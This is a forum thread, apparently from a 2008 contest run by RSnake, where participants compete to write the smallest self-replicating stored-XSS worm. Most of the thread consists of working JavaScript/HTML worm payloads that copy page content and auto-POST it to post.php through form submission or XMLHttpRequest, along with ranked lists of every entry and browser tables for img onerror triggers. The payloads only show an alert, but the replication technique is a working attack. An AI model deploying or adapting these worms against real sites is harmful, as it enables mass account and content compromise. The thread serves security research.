@ronald, well i assume the size-optimization is being done because of a hypothetical character-limit in the POST variable. so, if the next generation of the worm is the size of the entire page, that'll surely break it.

this is why the size of the largest descendent of the worm counts, not its original size (or just to keep it identical)

the problem with only submitting the JS, is that you need to get a hold on the JS itself, first.

bollocks, you could either post a .js file then and be done with the contest. But, document.body.form.innerHTML does the same, and is smaller. You only need to know what to submit.

don't see the issue here, cause it does what the original specs from RSnake demanded.

@Spikeman, whats the difference between yours and mine?


sirdarckcat Wrote:
-------------------------------------------------------
> ok, I'll show mine.. since almost all the tricks
> where revealed anyway..
>
> with(z)alert('XSS',submit(action=(method='post')+'
> .php',content.value=''+innerHTML.substr(0,148)))
>
> that's the rule-compilant version, of 159 bytes
>
> this is the small-notportable-but-effective
> version of 145 bytes:
>
> with(z)alert('XSS',submit(action=(method='post')+'
> .php',content.value=''+innerHTML))
>
> Greetz!!

Spikeman Wrote:
-------------------------------------------------------
> 143 bytes:
>
> with(z)alert('XSS',submit(action=(method='post')+'
> .php',content.value=''+innerHTML))
>
> Tested in Firefox and IE, quotes are added to make
> name="content" second time and after. It worked
> fine with content around it in my tests so the
> substring was unnecessary.
>
> Edit: I guess the added quotes make this
> technically 145 but that's still the smallest, no?

¬¬

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

'xcuze me for the double post but I like to clarify it, this take only the form contents, it can even be narrowed to the input itself.

<script>f.content.value=document.body.f.innerHTML+alert('xss');f.submit();</script>

81 chars.

I just hacked this together, great help from Alex and other people's work, dunno if it's already posted.:
[116 characters]

<form name=o action=post.php <img src=. onError=o.value=document.body.innerHTML+alert('xss');javascript:o.submit();>

@Ronald, I just read the rules, I thought you had to post to post.php, yours 'just' submits to the current page, right? Still, nice one!

Sorry, I really should have been more clear, and I'll revise the rules so this is more clear. Let's say your script is 200 chars long because, theoretically the reason we are doing this is to get past some char limit that we can't bypass. We can't use external scripts because it must be self contained.

So we must make something that replicates itself and fits within whatever char limit we are trying to beat. So if your worm is 200 chars to start with, assume a 200 char limit on the form you are submitting to. If it's 150 chars, assume a 150 char limit and so on. Requesting the entire page and submitting it would actually break in almost every real world example because it's additive. I submit my whole page, the next guy submits his which includes mine and so on. Eventually (and not too many nodes in the future) you'll hit size restrictions.

So, unfortunately, Ronald, your code, while smallest, will probably not work efficiently enough and ultimately isn't suitable for a winner. But fortunately you still have 5 days left.

- RSnake
Gotta love it. http://ha.ckers.org

<form method=post action=post.php name=i><input name=content><script>content.value=document.body.i.innerHTML+alert('xss');i.submit();</script>

139 then, with 139 char payload.

a screw it, I go get drunk. see ya later, and goodluck all.

Oops.. @Spyware: POST as method must be set, a form is default set to GET.


here is my last one: 138 char, fully form.

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>

Goodluck guys, have fun! (it was 4 me) ^^

Ooops that as retarded, it didn't replicate I blame the booze!

141 bytes my friend:

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>

ok I'm out, I take this as my contribution.

Enjoy.



Edited 1 time(s). Last edit at 01/05/2008 11:31AM by Ronald.

Oops, thanks Ronald!

Characters: 149

<form method=POST name=content action=post.php <img src=. onError=content.value=document.content.innerHTML+alert('xss');javascript:content.submit();>

I wish they changed the form default action though :/

Spyware:
when it's replicated, your code will be like this:

<form method="POST" name="content" action="post.php"><img src="." onError="content.value=document.content.innerHTML+alert('xss');javascript:content.submit();">

160 bytes.

Ronald:
when it's replicated, your code will be like this:

<input name="content"><script>i.content.value=document.body.innerHTML+alert('xss');i.submit();</script>

and wont work.

RSnake:
If I have the size limit of the size of my payload, then this code will be the smallest:

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</SCRIPT>

146 bytes

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 11:39AM by sirdarckcat.

No it won't, read again.

171 bytes. Replicates with the same length.

<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

@Spyware: setting the form name to content isn't working on my Firefox. It doesn't send the value to post.php. Sadly, I think <input name="content"> is a requirement for Firefox to send the data.



Edited 1 time(s). Last edit at 01/05/2008 11:42AM by barbarianbob.

ah yeah, u are right, I was reading thisone:

<form method=post action=post.php name=i><input name=content><script>i.content.value=document.i.innerHTML+alert('xss');i.submit();</script>

anyway, on yours you are asuming that your payload is the first thing on the document, and that wont by true on any attack

there should be a post with all codes..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 11:43AM by sirdarckcat.

<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>

I manage to slice 1 byte from sirdarkcat's rules compliant entry (158 VS 159 total, 156 on IE because of quote stripping) ;)
Goodbye until the 10th, deadly deadlines are knocking on my door :(

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

As a sidenote: Rsnake pointed out the <img src> possibilities in IE7 before.

Did someone else mention, that the dialog boxes don't pop up in the right order (counting from 1 to 8) in FF 2.0.0.11 ?
It says: 2, 4, 3, 7.

1<img src="/" onerror=alert(1)>FF2: no / IE7: yes / O: yes<br>
2<img src="." onerror=alert(2)>FF2: yes / IE7: yes / O: yes<br>
3<img src="" onerror=alert(3)>FF2: yes / IE7: yes / O: no<br>
4<img src=. onerror=alert(4)>FF2: yes / IE7: yes / O: yes<br>
5<img src=/ onerror=alert(5)>FF2: no / IE7: yes / O: yes<br>
6<img src= onerror=alert(6)>FF2: no / IE7: no / O: no<br>
7<img src onerror=alert(7)>FF2: yes / IE7: no / O: no<br>
8<img onerror=alert(8)>FF2: no / IE7: no / O: no

I used this code on two machines (Win XP / Vista) with the same result.

(Opera 9.25 added.)

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 3 time(s). Last edit at 01/05/2008 12:14PM by Alex.

So this is a list of all valid payloads.. if yours is missing, tell me.. if a payload here is not valid, tell me..

Places (not official, just to help everyone to follow track):

.- ma1 (129) [requires the user to focus a field]
.- Spyware (132) [requires the user to focus a field]
.- Spikeman (132) [requires the user to focus a field DOCTYPE ISSUES]
.- .mario (142) <form> (with doctype issues)
.- Ronald (144) <form> (with doctype issues)
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) <form> (with doctype issues)
.- sirdarckcat (160)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178)
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>
.- bwb labs 271 XHR
.- dev80 (doesnt work for Apache nor IIS)

TopCodes [9]:

0.- ma1 (136) [requires user to focus a field]
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

1.- shawn (153) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),143))</script>

2.- ma1 (156) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

1(or 3).- sirdarckcat (160)
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

2.- ma1 (163)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

3(or 4).- ritz (167)
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

4.- bwb labs (168) [DOESNT WORK FOR APACHE NOR IIS]
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

5.- babarianbob (171)
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

6.- .mario (178) 
<b><img src="m" onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

7.- Gareth Heyes (229) [CAN BE REDUCED]
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

8.- Matt Presson (233) [CAN BE REDUCED]
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

9.- digi7al64 (266) [CAN BE REDUCED]
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

RULES (from rsnake's post..)

1) must reside in UTF-8 or ISO-8859-1 encoding (nothing exotic please)
2) must self replicate the entire payload to a page called "post.php" as a parameter called "content" on the same domain (must be POSTed to that URL, no GETs please). We'll assume post.php will properly URL unescape your code.
3) must not grow in size after propagation (if your code starts off as n bytes, it must not grow to n+x)
4) must run as written (not just a parameter injection - we can infer how to turn it into a parameter injection later)
5) must not use anything from cookie or GET parameter space - every line of your code must reside on the page itself (mimicking stored XSS)
6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script on the page as that will change from site to site.
7) must work in at least Internet Explorer 7.0 and Firefox 2.x
8) must have a payload of "XSS" in an alert box


ALL CODES ~~ maybe there are some codes that doesnt work, I just tested the smaller ones

sirdarckcat 160
<form><INPUT name="content"><IMG src="" onerror="with(z=parentNode)submit(action=(method='post')+'.php',z[0].value='<form>'+innerHTML.slice(alert('XSS'),154))">

bwb labs 271 XHR
<img src='' alt="alert('XSS');var x=new XMLHttpRequest;x.open('post','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<img src=\'\' alt=\x22'+alt+'\x22 onerror=\'eval(alt)\'>'))" onerror='eval(alt)'>

Spikeman 132 DOCTYPE ISSUES REQUIRES USER INTERACTION
<form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button>

Ronald 144 DOCTYPE ISSUES
<form id=_><input name='content'><script>_[0].value='<form id=_>'+_.innerHTML;alert('XSS');_.action=(_.method='post')+'.php';_.submit()</script>

.mario 142 DOCTYPE ISSUES
<form><input id="i" name="content"><script>with(i.form)submit(alert('XSS'),action=(method='post')+'.php',i.value='<form>'+innerHTML)</script>

Spyware 132 REQUIRES USER INTERACTION
ý<form action="post.php" method="post"><input name="content" onfocus="alert('xss');value=body.innerHTML.slice(/ý.*/);submit();"></form>

OLD ONES (still valid)

== Gareth Heyes ==

<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

229 bytes

== digi7al64 ==

<div id=d><script>alert('xss');p='<form method=post name=f action=post.php><input type=text name=content value="+encodeURI("<div id=d>"+document.getElementById(\'d\').innerHTML+"</div>")+" /></form><script>document.f.submit();</script'+'>';p='document.write("'+p+'");';eval(p);</script></div>

292 bytes 

<div id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+encodeURI("<div id=e>"+d.getElementById(\'e\').innerHTML+"</div>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></div>

277 bytes 

<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

266 bytes

== Matt Presson ==

<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

233 bytes

== ritz ==

<i><img src="/" onerror="alert('xss');(f=(this.nextSibling)).firstChild.value='<i>'+this.parentNode.innerHTML+'</i>';f.submit()"><form method=post action=post.php><input name=content></form></i>

194 bytes

<s><img src=. onerror="alert('xss');f=this.nextSibling;f.firstChild.value='<s>'+this.parentNode.innerHTML+'</s>';f.submit()"><form method="post" action="post.php"><input name="content"></form></s>

196 bytes

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

186 bytes

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

167 bytes

== ma1 ==

<b><img src="." onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

183 bytes

<b><form method="post" action="post.php"><img src="." onerror="alert('xss');with(this.parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>

182 bytes

<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>

180 bytes

** works without doctype **

<form id=_><input name="content"><script>with(_)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(0,148)))</script>

158 bytes

== bwb labs ==

<b><img onerror="alert('xss');n=(m=this.parentNode).lastChild;n[0].value='<b>'+m.innerHTML+'</b>';n.submit()" src=""><form action="post.php" method="post"><input name="content"></form></b>

189 bytes

** not sure it works **

<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

168 bytes

== .mario ==

<b><img src="m" onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

178 bytes

== babarianbob ==

<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>

177 bytes

** works without doctype **

<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

171 bytes

== sirdarckcat ==

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

161 bytes

** works without doctype **

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

158 bytes

PS. ma1 is my master

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 36 time(s). Last edit at 01/06/2008 12:35PM by sirdarckcat.

@sirdarckcat

yeah that's what I said from the start, what should I assume then? now I killed my whole saturday finding out on the end that some things are not allowed. And also: what page requests a POSTED variable without a form? no page does that so a vector without a form is also valid! That's why I said that 80 chars would be a mimimum if the form is present, u see.

Stupid rules, because it's about replicating the worm and we all proved that it can be done in under 200 chars. Now I'm reminded why I never join contests, I guess it's going back to that mindset.

Sorry, had to add some more possibilities and browsers (new: Safari 3.04 Beta, Windows (Vista)):

0<img src=\ onerror=alert(0)>FF2: no / IE7: yes / O: yes / S: yes<br>
1<img src="/" onerror=alert(1)>FF2: no / IE7: yes / O: yes / S: yes<br>
2<img src="." onerror=alert(2)>FF2: yes / IE7: yes / O: yes / S: yes<br>
3<img src="" onerror=alert(3)>FF2: yes / IE7: yes / O: no / S: no<br>
4<img src=. onerror=alert(4)>FF2: yes / IE7: yes / O: yes / S: yes<br>
5<img src=/ onerror=alert(5)>FF2: no / IE7: yes / O: yes / S: yes<br>
6<img src= onerror=alert(6)>FF2: no / IE7: no / O: no / S: no<br>
7<img src onerror=alert(7)>FF2: yes / IE7: no / O: no / S: no<br>
8<img onerror=alert(8)>FF2: no / IE7: no / O: no / S: no<br>
9<img src="\" onerror=alert(9)>FF2: no / IE7: yes / O: yes / S: yes

Safari is funny ... It fires: 0, 9, 5, 2, 4.

---
~~Patching is for suckers~~

http://www.bitsploit.de

Using Opera 9.23 and IE 6.0.2900.2180 (xp pro,sp2)

1<img src="/" onerror=alert(1)>FF2: no / IE7: yes / Opera: yes / IE6: yes
2<img src="." onerror=alert(2)>FF2: yes / IE7: yes / Opera: yes / IE6: yes
3<img src="" onerror=alert(3)>FF2: yes / IE7: yes / Opera: no / IE6: yes
4<img src=. onerror=alert(4)>FF2: yes / IE7: yes / Opera: yes / IE6: yes
5<img src=/ onerror=alert(5)>FF2: no / IE7: yes / Opera: yes / IE6: yes
6<img src= onerror=alert(6)>FF2: no / IE7: no / Opera: no / IE6: no
7<img src onerror=alert(7)>FF2: yes / IE7: no / Opera: no / IE6: no
8<img onerror=alert(8)>FF2: no / IE7: no / Opera: no / IE6: no

The order of the boxes is logical in Opera. In IE, it seems random (???).

Edit: I tested, ate dinner, and then posted. So I got the Opera result independently.



Edited 1 time(s). Last edit at 01/05/2008 12:27PM by Torstein.

I only tested IE7. IE7's order is also logical.

And than I wrote this for FF 2.0.0.11:
2<img src="." onerror=alert('Please, ')>FF2: yes / IE7: yes / O: yes / S: yes<br>
3<img src="" onerror=alert('tell')>FF2: yes / IE7: yes / O: no / S: no<br>
4<img src=. onerror=alert('me')>FF2: yes / IE7: yes / O: yes / S: yes<br>
7<img src onerror=alert('more!')>FF2: yes / IE7: no / O: no / S: no<br>
So it should talk to me in a wrong sentence and it does, but I'd to delete the space between , and ' in the first line. Otherwise FF leaves it out. Huh !?

Sorry for being a little bit off topic, but I thought, that I should mention it 'cause of Rsnake's summary on page 2.

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 3 time(s). Last edit at 01/05/2008 12:38PM by Alex.

Ronald Wrote:
-------------------------------------------------------
> @sirdarckcat
>
> yeah that's what I said from the start, what
> should I assume then? now I killed my whole
> saturday finding out on the end that some things
> are not allowed. And also: what page requests a
> POSTED variable without a form? no page does that
> so a vector without a form is also valid! That's
> why I said that 80 chars would be a mimimum if the
> form is present, u see.
>
> Stupid rules, because it's about replicating the
> worm and we all proved that it can be done in
> under 200 chars. Now I'm reminded why I never join
> contests, I guess it's going back to that mindset.

yeah, I know.. but.. we dont have a form rsnake said so..
6) must not use knowledge of the DOM unless you name a class or and id and use the class or id. No looking for the n-th script on the page as that will change from site to site.

at least if there's a form, u dont know how to refer it.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

145 bytes, someone needs to double check that I didn't overlook something. Seems to work in both FF2 and IE7:

<script>function p() {
x=new XMLHttpRequest;
x.open("post","past.htm");
x.send("content=<script>" + p.valueOf() + "p()<\/script>");
}p()</script>

dev80:
you don't have the payload, test it, r u sure $_POST['content'] receives the value?

anyway it can be reduced.. and you are missing the payload

<script>function p(){with(XMLHttpRequest)open("post","past.php"),send("content=<script>"+p.valueOf(alert('xss'))+"p()<\/script>")}p()</script>

142 bytes

anyway, you need the addRequestHeader I think, I'm not really sure.. and maybe you need to encode the payload..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 12:49PM by sirdarckcat.

fuck it, screw the rules.

I got 141 bytes running here, and it does what the rules first implied namely: self replication. But who cares, I'm done with this bullshit.

@sirdarckcat: According to LiveHTTPHeaders the data gets send in the request body. Didn't double check in IE, but I will. Small update to reflect the proper CGI name.

<script>function p() {
x=new XMLHttpRequest;
x.open("post","post.php");
x.send("content=<script>" + p.valueOf() + "p()<\/script>");
}p()</script>

Just in case the "body/doctype" assumptions required by most of the entries following Sirdarckcat's former winner (including my own) were invalid, here's a fully DOM agnostic one:

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

163 bytes in it's longest, FF+IE compatible version.

With 1 more byte you can catch Opera and Safari too:

<form><INPUT name="content"><IMG src="/" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,158)))">

And that's really all from me until Thursday...
Cheers

P.S.: sirdarckcat, I love u :P

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

dev80

you are still missing the payload

the header is server dependant.. but not on all servers, rsnake has to explain on which servers this has to work..

anyway..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

ma1: yeah I love me too hehe

<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

161 bytes!

ouch!
this is almost as fun as hacking php-ids

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/05/2008 01:02PM by sirdarckcat.